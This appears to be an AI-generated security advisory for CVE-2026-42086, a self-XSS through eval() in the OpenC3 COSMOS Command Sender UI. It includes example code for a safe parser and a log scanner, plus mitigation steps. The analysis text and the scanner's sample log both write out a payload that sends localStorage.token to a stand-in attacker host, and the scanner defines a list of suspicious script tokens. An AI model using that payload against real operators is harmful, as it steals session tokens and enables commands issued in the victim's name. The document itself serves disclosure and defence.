CVE-2026-42086 Overview
CVE-2026-42086 is a self cross-site scripting (self-XSS) vulnerability in OpenC3 COSMOS, an open-source platform for sending commands to and receiving telemetry from embedded systems. The Command Sender UI passes array-like command parameters to JavaScript eval(), so attacker-supplied input is executed as code in the victim's browser session. Successful exploitation lets an attacker read or modify data in the authenticated browser context, including session tokens stored in localStorage. The issue affects all versions prior to 7.0.0 and is classified as CWE-79. The maintainers patched the flaw in version 7.0.0.
Critical Impact
An authenticated user tricked into pasting a crafted array parameter into the Command Sender UI executes attacker-controlled JavaScript in their session, exposing session tokens and authenticated COSMOS data.
Affected Products
- OpenC3 COSMOS versions prior to 7.0.0
- OpenC3 COSMOS Command Sender UI component
- Deployments exposing the COSMOS web interface to authenticated operators
Discovery Timeline
- 2026-05-04 - CVE-2026-42086 published to NVD
- 2026-05-04 - Last updated in NVD database
- Patched - Fix released in OpenC3 COSMOS version 7.0.0
Technical Details for CVE-2026-42086
Vulnerability Analysis
The vulnerability exists in the Command Sender UI of OpenC3 COSMOS. When an operator submits a command containing an array-like parameter, the front-end code passes the parameter string to JavaScript's eval() function to convert it into a runtime array. Because eval() executes any valid JavaScript, a crafted parameter such as [1,2];fetch('https://attacker.tld/?t='+localStorage.token) runs as code rather than being parsed as data. The execution occurs inside the authenticated COSMOS origin, granting the attacker access to session storage, DOM contents, and any API the user can reach.
This is classified as self-XSS because the malicious payload must be entered by the victim. Realistic delivery vectors include phishing emails or chat messages instructing operators to paste a value into the parameter field, or social engineering disguised as a legitimate command template. User interaction is required, which is reflected in the moderate scoring.
Root Cause
The root cause is unsafe use of eval() to deserialize user-controlled input. Secure parsers such as JSON.parse() or a dedicated array-literal tokenizer would treat the input strictly as data. The COSMOS team replaced the unsafe parsing path in version 7.0.0.
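The following is an added example (not OpenC3 COSMOS code) that places the eval()-based parsing pattern described in the Vulnerability Analysis and Root Cause sections beside a strict, data-only replacement. The function names and sample inputs are constructed for illustration; the "payload" in the demonstration only sets a flag so that the difference between the two parsers is observable without any harmful effect.

```javascript
// Added example, not OpenC3 COSMOS code. Function names and inputs are constructed.

// Vulnerable pattern: eval() executes whatever the string contains. A value of the
// form "[1,2];<statement>" runs the trailing statement in the page origin, and
// eval() returns the completion value of the LAST statement, not the array.
function parseArrayParamUnsafe(value) {
  // eslint-disable-next-line no-eval
  return eval(value);
}

// Hardened replacement: JSON.parse() treats the string strictly as data and throws
// on anything that is not a JSON literal. The shape is then enforced so that even
// valid JSON such as {"a":1}, [[1]] or [1,null] is rejected: a COSMOS array
// parameter is assumed here to be a flat array of finite numbers or strings.
function parseArrayParamSafe(value) {
  if (typeof value !== 'string') {
    throw new TypeError('array parameter must be a string');
  }
  let parsed;
  try {
    parsed = JSON.parse(value);
  } catch (err) {
    throw new Error(`array parameter is not a valid JSON array: ${err.message}`);
  }
  if (!Array.isArray(parsed)) {
    throw new Error('array parameter must be a JSON array literal');
  }
  for (const [i, item] of parsed.entries()) {
    const t = typeof item;
    if (!(t === 'number' && Number.isFinite(item)) && t !== 'string') {
      throw new Error(`element ${i} must be a finite number or a string`);
    }
  }
  return parsed;
}

// Wrapper returning { ok, value | error } so a UI can display a validation
// message instead of propagating an exception.
function validateArrayParam(value) {
  try {
    return { ok: true, value: parseArrayParamSafe(value) };
  } catch (err) {
    return { ok: false, error: err.message };
  }
}

// Demonstration: the same injected string handled by both parsers. The injected
// statement is benign (it sets a global flag) so the side effect can be checked.
const benignInjection = '[1,2];globalThis.__evalRan = true';

function demo() {
  globalThis.__evalRan = false;
  const viaEval = parseArrayParamUnsafe(benignInjection); // returns true (last statement), and the statement ran
  const evalRan = globalThis.__evalRan === true;           // true: code executed
  const viaSafe = validateArrayParam(benignInjection);     // { ok: false, error: ... }: rejected as data
  return { viaEval, evalRan, safeOk: viaSafe.ok, safeError: viaSafe.error };
}
```

One practical consequence of switching to JSON.parse() is that it is stricter than a JavaScript array literal: single-quoted strings, trailing commas and unquoted identifiers are rejected, so operators used to typing ['A', 'B'] need to use ["A", "B"]. That strictness is the point; the parser never evaluates the input.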
Attack Vector
The attack requires network access to the COSMOS web interface, valid low-privileged credentials, and user interaction. An attacker convinces an authenticated operator to paste a crafted string into an array parameter field of the Command Sender UI. When the command is submitted, the payload executes in the victim's browser. The attacker can then exfiltrate session tokens, issue commands on behalf of the user, or alter telemetry views.
No verified exploit code is published. See the GitHub Security Advisory for the maintainer's technical description.
Detection Methods for CVE-2026-42086
Indicators of Compromise
- Command Sender submissions where array parameter values contain JavaScript syntax such as fetch(, XMLHttpRequest, document.cookie, or localStorage.
- Outbound browser requests from operator workstations to unfamiliar domains immediately after a COSMOS command submission.
- Unexpected COSMOS API calls originating from a legitimate user session that the operator did not initiate.
Detection Strategies
- Inspect COSMOS application logs for command parameter values containing characters and tokens uncommon in numeric arrays, including (, ;, =, and identifier names.
- Deploy a Content Security Policy (CSP) report endpoint and monitor script-src violations originating from the Command Sender UI.
- Correlate browser proxy logs with COSMOS session activity to flag external HTTP requests triggered during command entry.
Monitoring Recommendations
- Alert on new outbound destinations contacted by browsers with active COSMOS sessions.
- Track command submissions per user and flag parameter payloads exceeding expected length or containing alphabetic characters where numerics are expected.
- Audit localStorage access patterns and authentication token reuse from unexpected IP addresses.
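The following is an added example (not OpenC3 COSMOS code) that implements the log-inspection heuristics from the Detection Strategies and Monitoring Recommendations lists: it scans command-log records for array-like parameter values that contain code punctuation, identifier characters outside quoted strings, the specific tokens listed under Indicators of Compromise, or an unexpected length. The JSON-lines log format, the sample records, the attacker.example hostname and the length threshold are all constructed for illustration; the real COSMOS log format will need its own record parser.

```javascript
// Added example, not OpenC3 COSMOS code. Log format, sample lines and threshold are constructed.

// Tokens listed on the page as uncommon in numeric arrays and typical of injected script.
const SUSPICIOUS_TOKENS = ['fetch(', 'XMLHttpRequest', 'document.cookie', 'localStorage', 'eval(', '<script'];
const MAX_ARRAY_PARAM_LENGTH = 256; // constructed threshold; tune to real command definitions

// A legitimate array parameter: a bracketed, comma-separated list of numbers or quoted strings.
const NUM = String.raw`-?\d+(?:\.\d+)?(?:[eE][-+]?\d+)?`;
const STR = String.raw`"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'`;
const ELEM = `(?:${NUM}|${STR})`;
const WELL_FORMED_ARRAY = new RegExp(String.raw`^\[\s*(?:${ELEM}\s*(?:,\s*${ELEM}\s*)*)?\]$`);

// Analyse one raw parameter value; returns a list of reasons (empty means clean).
function analyzeArrayParam(value) {
  const reasons = [];
  if (value.length > MAX_ARRAY_PARAM_LENGTH) reasons.push('length exceeds expected maximum');
  for (const tok of SUSPICIOUS_TOKENS) {
    if (value.includes(tok)) reasons.push(`contains ${tok}`);
  }
  if (!WELL_FORMED_ARRAY.test(value)) {
    if (/[;=(]/.test(value)) reasons.push('contains code punctuation ; = or (');
    // Remove quoted string contents, then any remaining letters are identifiers, not data.
    const stripped = value.replace(new RegExp(STR, 'g'), '""');
    if (/[A-Za-z_$]/.test(stripped)) reasons.push('identifier characters outside quoted strings');
    if (reasons.length === 0) reasons.push('not a well-formed array literal');
  }
  return reasons;
}

// Constructed JSON-lines command log: one record per submission, params hold the raw strings
// the operator typed. The second record carries the injection shape from the page (benign host).
const SAMPLE_LOG = [
  '{"time":"2026-05-04T10:12:03Z","user":"alice","target":"INST","cmd":"COLLECT","params":{"TYPE":"NORMAL","SAMPLES":"[1, 2, 3]"}}',
  '{"time":"2026-05-04T10:12:41Z","user":"bob","target":"INST","cmd":"ARYCMD","params":{"ARRAY":"[1,2];fetch(\'https://attacker.example/?t=\'+localStorage.token)"}}',
  '{"time":"2026-05-04T10:13:10Z","user":"carol","target":"INST","cmd":"ARYCMD","params":{"ARRAY":"[\\"A\\", \\"B\\"]"}}',
  '{"time":"2026-05-04T10:13:55Z","user":"dave","target":"INST","cmd":"ARYCMD","params":{"ARRAY":"[1, 2, x]"}}',
].join('\n');

// Scan a log text and return one alert per suspicious array-like parameter.
function scanCommandLog(text) {
  const alerts = [];
  for (const line of text.split('\n')) {
    if (!line.trim()) continue;
    let rec;
    try { rec = JSON.parse(line); } catch { continue; } // skip malformed records
    for (const [name, value] of Object.entries(rec.params || {})) {
      if (typeof value !== 'string' || !value.trimStart().startsWith('[')) continue; // array-like only
      const reasons = analyzeArrayParam(value.trim());
      if (reasons.length) {
        alerts.push({ time: rec.time, user: rec.user, cmd: `${rec.target} ${rec.cmd}`, param: name, reasons });
      }
    }
  }
  return alerts;
}

for (const a of scanCommandLog(SAMPLE_LOG)) {
  console.log(`${a.time} ${a.user} ${a.cmd} ${a.param}: ${a.reasons.join('; ')}`);
}
```

The well-formed-array check is intentionally the positive model: anything that is not a plain list of numbers or quoted strings is reported, and the token and punctuation checks only add explanatory reasons. Correlating each alert's timestamp and user with proxy logs for new outbound destinations, as the list above suggests, is the natural next step.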
How to Mitigate CVE-2026-42086
Immediate Actions Required
- Upgrade OpenC3 COSMOS to version 7.0.0 or later, which removes the unsafe eval() call.
- Invalidate active operator sessions and rotate any tokens stored in browser localStorage after upgrading.
- Brief operators on the self-XSS pattern and instruct them never to paste parameter values supplied by external parties.
Patch Information
The vulnerability is fixed in OpenC3 COSMOS version 7.0.0. Refer to the GitHub Security Advisory GHSA-ffq5-qpvf-xq7x for upgrade guidance and the patched commit reference.
Workarounds
- Restrict access to the COSMOS web interface to a trusted operator network segment until the upgrade is applied.
- Apply a strict Content Security Policy that disallows 'unsafe-eval' and inline scripts to limit payload execution. Note that on unpatched versions the Command Sender UI itself relies on eval() to parse array parameters, so such a policy will also block legitimate array input until the upgrade is applied.
- Require multi-factor authentication for operator accounts to reduce the value of stolen session tokens.
# Upgrade OpenC3 COSMOS containers to the patched release.
# Set the tag before pulling so that docker compose pulls the 7.0.0 images
# rather than the tag still recorded in .env (shell variables take precedence).
export OPENC3_TAG=7.0.0
docker compose pull
docker compose up -d
# Verify the running version (adjust host and port to your deployment)
curl -s http://cosmos.local:2900/openc3-api/version | jq .
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


